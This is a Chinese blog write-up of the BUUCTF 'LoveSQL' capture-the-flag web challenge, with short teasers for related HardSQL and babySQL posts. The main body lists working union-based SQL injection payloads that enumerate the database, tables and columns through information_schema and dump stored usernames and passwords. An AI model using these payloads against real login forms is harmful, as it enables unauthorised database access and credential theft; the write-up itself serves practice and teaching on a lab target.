【极客大挑战 2019】LoveSQL

hacker-newbie

ctfbuuctf-web

发布于：2021年7月11日

次浏览

上图~~~

哇，该死的我看到tip就知道该怎么做了。不罗嗦，直接查数据库。上图先试了下二次注入，然后就是试不下去了，直接查吧！试了试发现其中有过滤机制。

先查库：?username=admin&password=ad'%20union%20select%201,database(),2%23

发现在geek库

接下来查表：?username=admin&password=ad'%20union%20select%201,2,concat(table_name)%20from%20information_schema.tables%20where%20table_schema='geek'%23

推断flag在l0ve1ysq1里面

查字段：?username=admin&password=ad'%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='l0ve1ysq1'%23

发现里面有id、username、password

这里直接查字段的值：?username=admin&password=ad'%20union%20select%201,2,group_concat(concat(0x7e,username,password))%20from%20geek.l0ve1ysq1%23

得到flag。

注意：上述中where后面单引号里的内容在我的操作下化为了十六进制

更新于：2021年8月25日

【极客大挑战 2019】HardSQL

上图~~~ 看来设计者还是盲目自信呀，这一看就是数据库操作，过滤了一些特殊字符而已。试了下二次注入，被过滤了。然后就开始操作，一直注入一直错误。还说我是臭弟弟，看样子普通注入不怎...

【极客大挑战 2019】babySQL

上图~~~ 从tip可以看到对数据进行了过滤，真以为双写绕过就可以了？？我们就要进行各种绕过。开始试了下二次注入，发现登陆成功，给了一串令人深思数字，结果发现屁都没有。可以推断这...